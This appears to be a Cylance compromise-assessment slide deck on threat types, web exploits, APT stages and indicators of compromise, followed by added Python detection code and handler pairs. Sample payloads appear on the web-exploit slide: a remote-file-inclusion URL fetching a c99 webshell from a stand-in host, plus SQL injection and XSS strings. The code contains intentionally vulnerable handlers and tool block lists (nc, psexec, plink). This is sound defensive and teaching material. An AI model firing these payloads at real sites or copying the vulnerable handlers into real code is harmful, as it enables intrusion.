Mathematical Determination of Good and Bad: Leveraging Preventative/Response Professional Services
Cylance
Corey White, VP, Professional Services
PRESPONSE Professional Services
Risk Does Not Equal Threat | Presponse
Compromise Assessment

Malware - Windows / Linux / OSX (31% of cases did not use malware)
• Dropper/Downloaders – phishing and waterholing; malware in userspace; zero/single-day exploits that lead to…
• Backdoor Trojan RATs – kernel-interactive service binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – platforms for MAAS/subscription access
• WebShells – Internet-facing server backdoor RATs (c99/r57/eval)

Hacking - .day Exploits
• Zero Day – vulnerability that only the developer knows about
• ½ Day – vulnerability that is known about but no patch is yet available
• Single Day – vulnerability that is known about and patches are available but not applied
• Forever Day – vulnerability that is known and cannot be patched

Hacking - Web Server/Services Exploits
• Remote code execution (watch your .htaccess files!)
  – register_globals on in PHP | require ($page . ".php");
    http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
• SQL injection (watch your user privileges!)
  – AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1'='1'";
    http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)
• Cross Site Scripting/XSS (watch your syntax!)
  – Volatile entry in echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?>
    http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
• Username enumeration (watch your error messages!)
  – Username guessing | "Incorrect logon / password combination"

Social Engineering – Access, Behavior, and Authority
Sabotage
• Phishing
• Waterholing
• USB "HoneyDrops" and other free hardware
• "HelpDesk Operators"
• "Visitors" (repairmen, janitors, pizza/flower delivery, tailgaters)
Subversion
• Contractors
• Employees

Advanced Persistent Threat - Activities
Stage 1 - Compromise
• Social engineering backdoors
  – Phishing / Waterholing
  – Help Desk / Visitors
• Web site backdoors
• Reconnaissance
Stage 2 - Exploit
• Privilege escalation
• Lateral movement
• User profile abuse
• Remote access provisioning
• Services bypass/cancellation
Stage 3 - Control
• Configuration management
• Data targeting
• Data exfiltration
• Sabotage
• Subversion

Most commonly seen indicators of data loss:
• Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart files of particular sizes (250/500 MB)
• "Recycle"/Recycle Bin residue
• HTTP 206 (Partial Content) status codes on web servers
• Non-standard file transfer services (FileZilla, FTP, WsFTP, etc.)
• Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)

Most commonly seen indicators of sabotage:
• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON jobs
• Scripts
• Services cancellation
• User profile authority changes

Most commonly seen indicators of user profile abuse:
• Multiple user accounts on a single computer
• One user account on multiple computers
• Service and administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins, etc.)
• Local services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

Most commonly seen indicators of lateral movement:
• Access history (Type 3 / 4 / 8 / 10 logons, i.e. network, batch, network cleartext and remote interactive; AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant and non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PuTTY, PSEXEC, *FTP, SCP)
• Domain services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)

Most commonly seen indicators of insider threats:
• Unusual profile access and use history
  – Time
  – HostID
  – Application history
  – Configuration history
• RBAC violations
• Other Acceptable Use Policy violations
• Malware / PUP / PUM…

Most common malware identifiers:
• Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system

Compromise Assessment: Issues, Not Indicators. Focus on Priorities. Get Ahead of Compromise Activities.
• Monitor
  – Persistence settings: registry keys, startup folders, scheduled jobs/tasks
  – Service creations
• Alert
  – User profile propagation
  – Lateral movement/access
  – Anomalous use (time/resources)
  – Service state changes (start/stop)
  – File creations by type (RAR, BAT, VBS, SH, etc.)
  – Sinkhole communications
• Prevent
  – Assess and secure networks and applications
  – Automated tasks
  – Known PUP/PUMs
  – User-space execution

Victimization
• Email
• Social engineering
• Web
• Supply chain
• Candy drop
• Insider
• TCP/135
• Direct open ports

Innovation Requires STARVATION
WARNING: Deprogramming Required
• NO signatures
• NO heuristics
• NO behavioral
• NO sandboxing
• NO dynamic detonation
• NO micro-virtualization
• JUST 100% pure MATH

[Figure: the "greylist" gap. Blacklist (about 20%, the known malicious: antivirus/HIPS, server AV, behavioral analysis, email/web gateway, firewall, sandboxing, IDS/IPS) and whitelist (about 20%, the known good: whitelisting) both mean "trust the vendor"; the 60%+ of unknown software in between is the gap that 100% pure math is meant to cover: "trust the math".]

Infinity Product Portfolio (releases: June 2013, October 2013, February 2014, April 2014)
• DETECT
• SWEEP*
• Free, silent
• REST API over SSL
• Advanced threat
• Over 5,000 seats
• V-API, V-Forensics, V-Gateway, V-Helpdesk
• Windows agent
• Cloud management
• Silent / small footprint
• Browser delivery
• Detection of threats
• Detection only / detection and protection (with protection option)
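The three web-exploit patterns on the "Hacking - Web Server/Services Exploits" slide (remote file inclusion through an unchecked include, SQL injection, reflected XSS) as an added Python example; this is not code from the slides or from Cylance. It pairs a small request classifier, which flags the slide's own three URLs, with each vulnerable handler and its hardened form. The users table, the page allowlist and the regular expressions are constructed for the demo; the regexes are deliberately narrow and would need tuning before use against real web logs.

```python
"""Request classifier plus vulnerable/hardened handler pairs for RFI, SQLi
and XSS. Added example, not code from the slides or from Cylance; the sample
users, allowlist and URLs below are constructed for the demo."""
import html
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Request-level patterns a compromise assessment would pull from web logs
# (assumed patterns, kept narrow on purpose).
RFI_RE = re.compile(r"^(https?|ftp)://", re.I)                    # page=http://.../c99.txt
SQLI_RE = re.compile(r"'\s*(or|and)\s+'?|\s(or|and)\s+\d+\s*=|@@version|convert\(int", re.I)
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.I)

def flag_request(url):
    """Return the set of slide patterns matched by any query parameter of url."""
    findings = set()
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for values in params.values():
        for value in values:
            if RFI_RE.search(value):
                findings.add("RFI")
            if SQLI_RE.search(value):
                findings.add("SQLi")
            if XSS_RE.search(value):
                findings.add("XSS")
    return findings

# --- SQL injection: "SELECT * FROM users WHERE username = '' or '1'='1'" ---
def make_db():
    """Constructed sample table (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def lookup_user_vulnerable(conn, username):
    # String building: the OR clause supplied by the client is parsed as SQL.
    query = "SELECT username FROM users WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(query)]

def lookup_user_safe(conn, username):
    # Bound parameter: the same payload is compared as a literal string.
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,))]

# --- Reflected XSS: echo($_GET[name_1]) with no output encoding ---
def render_name_vulnerable(name):
    return "<p>Your Name <br />" + name + "</p>"

def render_name_safe(name):
    # Encode for the HTML body context; <script> becomes inert text.
    return "<p>Your Name <br />" + html.escape(name, quote=True) + "</p>"

# --- RFI: require($page . ".php") with an attacker-chosen $page ---
PAGES = {"index": "index.php", "about": "about.php"}   # constructed allowlist

def include_page_vulnerable(page):
    # Whatever the client sends becomes the include path or URL.
    return page + ".php"

def include_page_safe(page):
    # Map the client value onto a fixed allowlist; None means "refuse".
    return PAGES.get(page)

if __name__ == "__main__":
    for url in ("http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt",
                "http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)",
                "http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>",
                "http://www.plshackme.com/index.php?page=about"):
        print(sorted(flag_request(url)) or "clean", url)
    db = make_db()
    print(lookup_user_vulnerable(db, "' or '1'='1"), lookup_user_safe(db, "' or '1'='1"))
```

The classifier is the triage view (what the slide's "watch your ..." warnings look like in an access log); the handler pairs are the fix: parameterised queries, context-appropriate output encoding, and an allowlist instead of a client-controlled include path.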
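The "most commonly seen indicators" slides and the Monitor / Alert list turned into detection logic, as an added Python example that is not Cylance's tooling or code from the slides. It runs the checks over a constructed, already-normalised event stream (logons, process creations, file writes, service installs, registry writes). The event schema, host and user names, tool lists and thresholds (three or more remote-type logons to distinct hosts per account, 250/500 MB multipart sizes, a 07:00 to 19:00 working window) are assumptions made for the demo.

```python
"""Indicator checks from the lateral movement, data loss, sabotage and
Monitor/Alert slides over a constructed event stream. Added example; not
Cylance's tooling or code from the slides. Schema, names, tool lists and
thresholds are assumptions for this demo."""
from collections import defaultdict

# Constructed events. A real pipeline would derive these from Security 4624
# logons and 4688 process creations, System 7045 service installs, and file
# and registry auditing. Times are HH:MM local.
EVENTS = [
    {"kind": "logon", "user": "jsmith", "host": "WS-12", "type": 10, "time": "02:10"},
    {"kind": "logon", "user": "jsmith", "host": "FS-01", "type": 3, "time": "02:12"},
    {"kind": "logon", "user": "jsmith", "host": "SQL-02", "type": 3, "time": "02:13"},
    {"kind": "logon", "user": "jsmith", "host": "DC-01", "type": 3, "time": "02:14"},
    {"kind": "process", "host": "WS-12", "cmd": r"at.exe \\FS-01 03:00 cmd /c c:\temp\r.bat"},
    {"kind": "process", "host": "WS-12", "cmd": r"psexec.exe \\SQL-02 -s cmd"},
    {"kind": "process", "host": "WS-12", "cmd": r"rar.exe a -v500m c:\temp\out.rar d:\finance"},
    {"kind": "file", "host": "WS-12", "path": r"c:\temp\out.part1.rar", "size": 524288000},
    {"kind": "file", "host": "WS-12", "path": r"c:\temp\out.part2.rar", "size": 524288000},
    {"kind": "service", "host": "FS-01", "name": "PSEXESVC", "image": r"c:\windows\psexesvc.exe"},
    {"kind": "registry", "host": "WS-12", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\upd"},
    {"kind": "logon", "user": "abrown", "host": "WS-07", "type": 2, "time": "09:05"},
    {"kind": "process", "host": "WS-07", "cmd": r"winword.exe c:\users\abrown\q1.docx"},
]

REMOTE_LOGON_TYPES = {3, 4, 8, 10}   # network, batch, network cleartext, RDP
REMOTE_JOB_TOOLS = {"at.exe", "schtasks.exe", "sc.exe", "wmic.exe", "ssh.exe"}
RAS_TOOLS = {"winvnc.exe", "teamviewer.exe", "logmein.exe", "nc.exe", "putty.exe",
             "plink.exe", "psexec.exe", "winscp.exe", "filezilla.exe"}
PACKAGERS = {"rar.exe", "winrar.exe", "7z.exe", "gzip.exe", "pkzip.exe"}
ARCHIVE_EXT = (".rar", ".7z", ".gz", ".zip")
MULTIPART_SIZES = (250 * 1024 * 1024, 500 * 1024 * 1024)
PERSISTENCE_KEYS = (r"\currentversion\run", r"\currentversion\runonce",
                    r"\start menu\programs\startup")
WORK_HOURS = range(7, 19)   # assumed 07:00 to 18:59 business window

def _exe(cmd):
    """Base name of the executable in a command line (assumes no quoted paths)."""
    return cmd.split()[0].lower().rsplit("\\", 1)[-1]

def check_lateral_movement(events, min_hosts=3):
    """One account reaching several hosts over remote logon types."""
    hosts = defaultdict(set)
    for e in events:
        if e["kind"] == "logon" and e["type"] in REMOTE_LOGON_TYPES:
            hosts[e["user"]].add(e["host"])
    return [("lateral movement", user, sorted(h))
            for user, h in hosts.items() if len(h) >= min_hosts]

def check_tools(events):
    """Remote job scheduling, non-standard RAS tools and packagers by image name."""
    alerts = []
    for e in events:
        if e["kind"] != "process":
            continue
        exe = _exe(e["cmd"])
        if exe in REMOTE_JOB_TOOLS:
            alerts.append(("remote job scheduling", e["host"], exe))
        if exe in RAS_TOOLS:
            alerts.append(("non-standard RAS tool", e["host"], exe))
        if exe in PACKAGERS:
            alerts.append(("non-standard packager", e["host"], exe))
    return alerts

def check_data_loss(events, tolerance=0.02):
    """Archive parts sized at the 250/500 MB multipart boundaries."""
    return [("multipart archive", e["host"], e["path"]) for e in events
            if e["kind"] == "file" and e["path"].lower().endswith(ARCHIVE_EXT)
            and any(abs(e["size"] - s) <= s * tolerance for s in MULTIPART_SIZES)]

def check_persistence_and_services(events):
    """Service creations and writes to autostart registry locations."""
    alerts = []
    for e in events:
        if e["kind"] == "service":
            alerts.append(("service creation", e["host"], e["name"]))
        elif e["kind"] == "registry" and any(k in e["key"].lower() for k in PERSISTENCE_KEYS):
            alerts.append(("persistence key", e["host"], e["key"]))
    return alerts

def check_anomalous_time(events):
    """Logons outside the assumed working window."""
    return [("off-hours logon", e["user"], e["time"]) for e in events
            if e["kind"] == "logon" and int(e["time"].split(":")[0]) not in WORK_HOURS]

def run_all(events):
    return (check_lateral_movement(events) + check_tools(events) + check_data_loss(events)
            + check_persistence_and_services(events) + check_anomalous_time(events))

if __name__ == "__main__":
    for alert in run_all(EVENTS):
        print(alert)
```

Each check on its own is noisy (an administrator also runs sc.exe and logs on to many hosts); the slide's point about issues rather than indicators is that the same account showing up in several of these lists at once, off hours, on the same workstation, is what to prioritise, which is what correlating the alert tuples by user and host would surface.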